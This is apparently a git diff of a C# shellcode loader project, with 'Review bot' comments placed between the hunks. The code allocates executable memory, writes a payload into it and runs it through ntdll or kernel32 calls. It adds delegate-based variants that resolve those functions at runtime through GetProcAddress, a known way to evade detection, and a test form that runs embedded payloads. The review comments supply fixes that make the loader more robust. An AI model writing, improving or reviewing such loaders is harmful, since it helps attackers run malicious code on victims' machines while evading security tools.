diff --git a/.vs/ShellCodeLoader/v16/.suo b/.vs/ShellCodeLoader/v16/.suo
index 37328e5..2faaea6 100644
Binary files a/.vs/ShellCodeLoader/v16/.suo and b/.vs/ShellCodeLoader/v16/.suo differ
diff --git a/.vs/ShellCodeLoader/v16/Browse.VC.db b/.vs/ShellCodeLoader/v16/Browse.VC.db
index 2621b14..a00aa95 100644
Binary files a/.vs/ShellCodeLoader/v16/Browse.VC.db and b/.vs/ShellCodeLoader/v16/Browse.VC.db differ
diff --git a/.vs/ShellCodeLoader/v16/Browse.VC.db-shm b/.vs/ShellCodeLoader/v16/Browse.VC.db-shm
index 64bf7da..9f63776 100644
Binary files a/.vs/ShellCodeLoader/v16/Browse.VC.db-shm and b/.vs/ShellCodeLoader/v16/Browse.VC.db-shm differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db b/.vs/ShellCodeLoader/v16/Solution.VC.db
new file mode 100644
index 0000000..86bbea7
Binary files /dev/null and b/.vs/ShellCodeLoader/v16/Solution.VC.db differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db-shm b/.vs/ShellCodeLoader/v16/Solution.VC.db-shm
new file mode 100644
index 0000000..ad86a11
Binary files /dev/null and b/.vs/ShellCodeLoader/v16/Solution.VC.db-shm differ
diff --git a/.vs/ShellCodeLoader/v16/Solution.VC.db-wal b/.vs/ShellCodeLoader/v16/Solution.VC.db-wal
new file mode 100644
index 0000000..bfad33a
Binary files /dev/null and b/.vs/ShellCodeLoader/v16/Solution.VC.db-wal differ
diff --git a/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache
index 4082ba1..d1579b8 100644
Binary files a/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache and b/PayloadCSharp/obj/Release/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache
new file mode 100644
index 0000000..8ad0473
Binary files /dev/null and b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.AssemblyReference.cache differ
diff --git a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt
index 7c0909c..cea0c37 100644
--- a/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt
+++ b/PayloadCSharp/obj/x64/Release/PayloadCSharp.csproj.FileListAbsolute.txt
@@ -4,3 +4,4 @@ F:\Personal\ShellCodeLoader\PayloadCSharp\bin\x64\Release\PayloadCSharp.pdb
F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.csproj.CoreCompileInputs.cache
F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.exe
F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.pdb
+F:\Personal\ShellCodeLoader\PayloadCSharp\obj\x64\Release\PayloadCSharp.csproj.AssemblyReference.cache
diff --git a/ShellCodeLoader.sln b/ShellCodeLoader.sln
index 0e2c252..7b17628 100644
--- a/ShellCodeLoader.sln
+++ b/ShellCodeLoader.sln
@@ -35,8 +35,8 @@ Global
{B2A57A97-4D88-4942-A4B3-06AA466080F2}.Release|x86.Build.0 = Release|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|Any CPU.Build.0 = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|Any CPU
- {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|Any CPU
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.ActiveCfg = Debug|x64
+ {9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x64.Build.0 = Debug|x64
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.ActiveCfg = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Debug|x86.Build.0 = Debug|Any CPU
{9B489FF7-A0FB-4813-96AD-B6D604DA87FC}.Release|Any CPU.ActiveCfg = Debug|Any CPU
diff --git a/ShellCodeLoader/ShellCodeLoader.cs b/ShellCodeLoader/ShellCodeLoader.cs
index 19e3fb3..0697279 100644
--- a/ShellCodeLoader/ShellCodeLoader.cs
+++ b/ShellCodeLoader/ShellCodeLoader.cs
@@ -13,6 +13,7 @@ public class ShellCodeLoader : IDisposable
{
private byte[] ShellCode;
private IntPtr ptr;
+ private uint RegionSize;
///
/// Default is false.
///
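Review bot: The new `RegionSize` field is declared `uint`, but the later hunks of this file pass it by `ref` to `NtAllocateVirtualMemory`, `NtProtectVirtualMemory` and `NtFreeVirtualMemory`, whose native size argument is a pointer to a `SIZE_T`. In a 64-bit process the write-back is 8 bytes wide, so it now lands in a 4-byte field inside the managed object and can overwrite whatever the runtime placed next to it. Declare the field pointer-sized, `private UIntPtr RegionSize;`, change the matching `ref uint` parameters in `Imports` and `Imports.Delegates` to `ref UIntPtr`, and pass `(uint)RegionSize` to the `VirtualProtect` calls. The class body continues outside this hunk.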
@@ -24,40 +25,23 @@ public class ShellCodeLoader : IDisposable
public ShellCodeLoader(byte[] shellCode)
{
this.ShellCode = shellCode;
- Asynchronous = false;
+ this.RegionSize = (uint)shellCode.Length;
+ this.ptr = IntPtr.Zero;
+ this.Asynchronous = false;
}
public void LoadWithNT()
{
-
if (this.Asynchronous)
{
Task.Run(() =>
{
- this.ptr = IntPtr.Zero;
- uint RegionSize = (uint)ShellCode.Length;
- Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
- UIntPtr bytesWritten;
- Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
- Imports.PageProtection flOld = new Imports.PageProtection();
- Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
- ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
- load();
- Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.FreeType.MEM_RELEASE);
+ NT();
});
}
else
{
- this.ptr = IntPtr.Zero;
- uint RegionSize = (uint)ShellCode.Length;
- Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
- UIntPtr bytesWritten;
- Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
- Imports.PageProtection flOld = new Imports.PageProtection();
- Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
- ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
- load();
- Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.FreeType.MEM_RELEASE);
+ NT();
}
}
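Review bot: Moving the `ptr` and `RegionSize` initialisation into the constructor means both are set once per instance, whereas the removed code reset them at the start of every load. `NtAllocateVirtualMemory` and `NtFreeVirtualMemory` take both by `ref` and can write them back, so a second `LoadWithNT()` on the same object would start from whatever the first call left behind, including a non-zero base address. Resetting at the top of the private `NT()` helper (defined in the next hunk) restores the old behaviour: `this.ptr = IntPtr.Zero; this.RegionSize = (uint)ShellCode.Length;`. The constructor also dereferences `shellCode` without a null check, so `if (shellCode == null) throw new ArgumentNullException(nameof(shellCode));` belongs before the assignments.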
@@ -67,55 +51,145 @@ public void LoadWithKernel32()
{
Task.Run(() =>
{
- this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
- uint RegionSize = (uint)ShellCode.Length;
- UIntPtr writtenBytes;
- Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
- Imports.PageProtection flOld;
- Imports.VirtualProtect(ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
- ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
- load();
- Imports.VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);
+ Kernel32();
+ });
+ }
+ else
+ {
+ Kernel32();
+ }
+ }
+
+ public void LoadWithNTDelegates()
+ {
+ if (this.Asynchronous)
+ {
+ Task.Run(() =>
+ {
+ NTDelegates();
});
}
else
{
- this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
- uint RegionSize = (uint)ShellCode.Length;
- UIntPtr writtenBytes;
- Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
- Imports.PageProtection flOld;
- Imports.VirtualProtect(ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
- ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
- load();
- Imports.VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);
+ NTDelegates();
}
}
+
+ public void LoadWithKernel32Delegates()
+ {
+ if (this.Asynchronous)
+ {
+ Kernel32Delegates();
+ }
+ else
+ {
+ Kernel32Delegates();
+ }
+ }
+
+ private void NT()
+ {
+ Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+ UIntPtr bytesWritten;
+ Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+ Imports.PageProtection flOld = new Imports.PageProtection();
+ Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
+ ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ load();
+ Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.FreeType.MEM_RELEASE);
+ }
+
+ private void Kernel32()
+ {
+ this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+ UIntPtr writtenBytes;
+ Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+ Imports.PageProtection flOld;
+ Imports.VirtualProtect(ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
+ ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ load();
+ Imports.VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);
+ }
+
+ private void NTDelegates()
+ {
+ IntPtr ExportedNtAllocateVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtAllocateVirtualMemory");
+ Imports.Delegates.NtAllocateVirtualMemory NtAllocateVirtualMemory = (Imports.Delegates.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtAllocateVirtualMemory, typeof(Imports.Delegates.NtAllocateVirtualMemory));
+ NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+
+ UIntPtr bytesWritten;
+ IntPtr ExportedNtWriteVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtWriteVirtualMemory");
+ Imports.Delegates.NtWriteVirtualMemory NtWriteVirtualMemory = (Imports.Delegates.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtWriteVirtualMemory, typeof(Imports.Delegates.NtWriteVirtualMemory));
+ NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+
+ Imports.PageProtection flOld = new Imports.PageProtection();
+ IntPtr ExportedNtProtectVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtProtectVirtualMemory");
+ Imports.Delegates.NtProtectVirtualMemory NtProtectVirtualMemory = (Imports.Delegates.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtProtectVirtualMemory, typeof(Imports.Delegates.NtProtectVirtualMemory));
+ NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, ref flOld);
+
+ ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ load();
+
+ IntPtr ExportedNtFreeVirtualMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.NTDLL), "NtFreeVirtualMemory");
+ Imports.Delegates.NtFreeVirtualMemory NtFreeVirtualMemory = (Imports.Delegates.NtFreeVirtualMemory)Marshal.GetDelegateForFunctionPointer(ExportedNtFreeVirtualMemory, typeof(Imports.Delegates.NtFreeVirtualMemory));
+ NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, Imports.FreeType.MEM_RELEASE);
+ }
+
+ private void Kernel32Delegates()
+ {
+ IntPtr ExportedVirtualAlloc = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualAlloc");
+ Imports.Delegates.VirtualAlloc VirtualAlloc = (Imports.Delegates.VirtualAlloc)Marshal.GetDelegateForFunctionPointer(ExportedVirtualAlloc, typeof(Imports.Delegates.VirtualAlloc));
+ this.ptr = VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, Imports.TypeAlloc.MEM_COMMIT | Imports.TypeAlloc.MEM_RESERVE, Imports.PageProtection.PAGE_EXECUTE_READWRITE);
+
+ UIntPtr writtenBytes;
+ IntPtr ExportedWriteProcessMemory = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "WriteProcessMemory");
+ Imports.Delegates.WriteProcessMemory WriteProcessMemory = (Imports.Delegates.WriteProcessMemory)Marshal.GetDelegateForFunctionPointer(ExportedWriteProcessMemory, typeof(Imports.Delegates.WriteProcessMemory));
+ WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+
+ Imports.PageProtection flOld;
+ IntPtr ExportedVirtualProtect = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualProtect");
+ Imports.Delegates.VirtualProtect VirtualProtect = (Imports.Delegates.VirtualProtect)Marshal.GetDelegateForFunctionPointer(ExportedVirtualProtect, typeof(Imports.Delegates.VirtualProtect));
+ VirtualProtect(ptr, RegionSize, Imports.PageProtection.PAGE_EXECUTE_READ, out flOld);
+
+ ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ load();
+
+ IntPtr ExportedVirtualFree = Imports.GetProcAddress(Imports.GetModuleHandle(Imports.KERNEL32), "VirtualFree");
+ Imports.Delegates.VirtualFree VirtualFree = (Imports.Delegates.VirtualFree)Marshal.GetDelegateForFunctionPointer(ExportedVirtualFree, typeof(Imports.Delegates.VirtualFree));
+ Imports.VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);
+ }
+
private static class Imports
{
+
internal const String KERNEL32 = "kernel32.dll";
internal const String NTDLL = "ntdll.dll";
- [DllImport(NTDLL, SetLastError = true, ExactSpelling = true)]
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
- [DllImport(NTDLL, SetLastError = true, ExactSpelling = true)]
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
- [DllImport(NTDLL, SetLastError = true, ExactSpelling = true)]
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
- [DllImport(NTDLL, SetLastError = true, ExactSpelling = true)]
+ [DllImport(NTDLL, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr GetCurrentProcess();
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
- [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true)]
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+ [DllImport(KERNEL32)]
+ public static extern IntPtr GetModuleHandle(string lpModuleName);
+ [DllImport(KERNEL32)]
+ public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+
public enum PageProtection : uint
{
PAGE_EXECUTE = 0x10,
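Review bot: `LoadWithKernel32Delegates` calls `Kernel32Delegates()` in both branches, so the `Asynchronous` flag has no effect there; the true branch should match the other three loaders, `Task.Run(() => { Kernel32Delegates(); });`. In `Kernel32Delegates` the `VirtualFree` delegate is resolved and then never used, because the last line calls `Imports.VirtualFree(...)`; it should read `VirtualFree(ptr, (uint)0, Imports.FreeType.MEM_RELEASE);`. None of the four private helpers checks a result: a zero from `GetModuleHandle` or `GetProcAddress` makes `Marshal.GetDelegateForFunctionPointer` throw, and a failed allocation or protection change is followed by the write and the call anyway. Each step should test its return value, and the free should sit in a `finally`. The `Imports` class continues outside this hunk.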
@@ -150,6 +224,27 @@ public enum FreeType : uint
MEM_COALESCE_PLACEHOLDERS = 0x00000001,
MEM_PRESERVE_PLACEHOLDER = 0x00000002
}
+
+ internal static class Delegates
+ {
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate uint NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref uint RegionSize, TypeAlloc AllocationType, PageProtection Protect);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate uint NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] buffer, UIntPtr bufferSize, out UIntPtr written);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate uint NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint numberOfBytes, PageProtection newProtect, ref PageProtection oldProtect);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate uint NtFreeVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref uint RegionSize, FreeType FreeType);
+
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate IntPtr VirtualAlloc(IntPtr address, IntPtr numBytes, TypeAlloc commitOrReserve, PageProtection pageProtectionMode);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate IntPtr VirtualFree(IntPtr lpAddress, uint dwSize, FreeType FreeType);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate bool VirtualProtect(IntPtr lpAddress, uint dwSize, PageProtection flNewProtect, out PageProtection lpflOldProtect);
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+ }
}
private bool _disposed = false;
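Review bot: The new delegate types carry only `[UnmanagedFunctionPointer(CallingConvention.StdCall)]`, whereas the `DllImport` declarations they mirror set `SetLastError = true`, so `Marshal.GetLastWin32Error()` is unreliable after a call made through the kernel32 delegates. Using `[UnmanagedFunctionPointer(CallingConvention.StdCall, SetLastError = true)]` on the four kernel32 delegates keeps the two call paths consistent. The signatures are hand-copied from the `DllImport` block, so a short comment on `Delegates`, e.g. `// Signatures must match the DllImport declarations in Imports.`, would help the next edit keep them in step. `Imports` and the enclosing class begin outside this hunk.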
diff --git a/ShellCodeLoader/ShellCodeLoader.csproj b/ShellCodeLoader/ShellCodeLoader.csproj
index 6841c72..3d87c82 100644
--- a/ShellCodeLoader/ShellCodeLoader.csproj
+++ b/ShellCodeLoader/ShellCodeLoader.csproj
@@ -32,13 +32,7 @@
-
-
-
-
-
-
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache
index 40190bb..e83d642 100644
Binary files a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache and b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.AssemblyReference.cache differ
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache
index 5ee1e98..cae91c6 100644
--- a/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache
+++ b/ShellCodeLoader/obj/Debug/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-a8992992a2a1f857e94d2c190e6e2acb3d35d990
+2f4efe2492a647ca473cd41a9e195057146d9428
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll b/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll
index 89c5963..ac59f58 100644
Binary files a/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll and b/ShellCodeLoader/obj/Debug/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb b/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb
index c0c69b6..238d608 100644
Binary files a/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb and b/ShellCodeLoader/obj/Debug/ShellCodeLoader.pdb differ
diff --git a/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache
index 3ff27a2..a606657 100644
Binary files a/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache and b/ShellCodeLoader/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
index 6ada075..a08e837 100644
--- a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
+++ b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-9fef0c49f4b5f7b005b68c57fc326668b2cc8ace
+1c02f89cdd426da38f937db1d7ded7d8cbdc2708
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll
index 5e34293..c12f470 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll and b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb b/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb
index d7a84de..345f2ae 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb and b/ShellCodeLoader/obj/Release/ShellCodeLoader.pdb differ
diff --git a/Test/Form1.Designer.cs b/Test/Form1.Designer.cs
index b9fafbe..f84a27c 100644
--- a/Test/Form1.Designer.cs
+++ b/Test/Form1.Designer.cs
@@ -31,6 +31,8 @@ private void InitializeComponent()
{
this.button1 = new System.Windows.Forms.Button();
this.button2 = new System.Windows.Forms.Button();
+ this.button3 = new System.Windows.Forms.Button();
+ this.button4 = new System.Windows.Forms.Button();
this.SuspendLayout();
//
// button1
@@ -53,11 +55,33 @@ private void InitializeComponent()
this.button2.UseVisualStyleBackColor = true;
this.button2.Click += new System.EventHandler(this.button2_Click);
//
+ // button3
+ //
+ this.button3.Location = new System.Drawing.Point(12, 89);
+ this.button3.Name = "button3";
+ this.button3.Size = new System.Drawing.Size(121, 59);
+ this.button3.TabIndex = 2;
+ this.button3.Text = "NT Delegates";
+ this.button3.UseVisualStyleBackColor = true;
+ this.button3.Click += new System.EventHandler(this.button3_Click);
+ //
+ // button4
+ //
+ this.button4.Location = new System.Drawing.Point(149, 89);
+ this.button4.Name = "button4";
+ this.button4.Size = new System.Drawing.Size(121, 59);
+ this.button4.TabIndex = 3;
+ this.button4.Text = "Kernel32 Delegates";
+ this.button4.UseVisualStyleBackColor = true;
+ this.button4.Click += new System.EventHandler(this.button4_Click);
+ //
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
- this.ClientSize = new System.Drawing.Size(292, 94);
+ this.ClientSize = new System.Drawing.Size(292, 160);
+ this.Controls.Add(this.button4);
+ this.Controls.Add(this.button3);
this.Controls.Add(this.button2);
this.Controls.Add(this.button1);
this.Name = "Form1";
@@ -70,6 +94,8 @@ private void InitializeComponent()
private System.Windows.Forms.Button button1;
private System.Windows.Forms.Button button2;
+ private System.Windows.Forms.Button button3;
+ private System.Windows.Forms.Button button4;
}
}
diff --git a/Test/Form1.cs b/Test/Form1.cs
index c98bee3..0928139 100644
--- a/Test/Form1.cs
+++ b/Test/Form1.cs
@@ -61,5 +61,52 @@ private void button2_Click(object sender, EventArgs e)
csharp.Dispose();
}
}
+
+ private void button3_Click(object sender, EventArgs e)
+ {
+ if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp64.rawData);
+ cpp.LoadWithNTDelegates();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp64.rawData);
+ csharp.LoadWithNTDelegates();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoader cpp = new ShellCodeLoader.ShellCodeLoader(PayloadCpp32.rawData);
+ cpp.Asynchronous = true;
+ cpp.LoadWithNTDelegates();
+ cpp.Dispose();
+ ShellCodeLoader.ShellCodeLoader csharp = new ShellCodeLoader.ShellCodeLoader(PayloadCSharp32.rawData);
+ csharp.LoadWithNTDelegates();
+ csharp.Dispose();
+ }
+ }
+
+ private void button4_Click(object sender, EventArgs e)
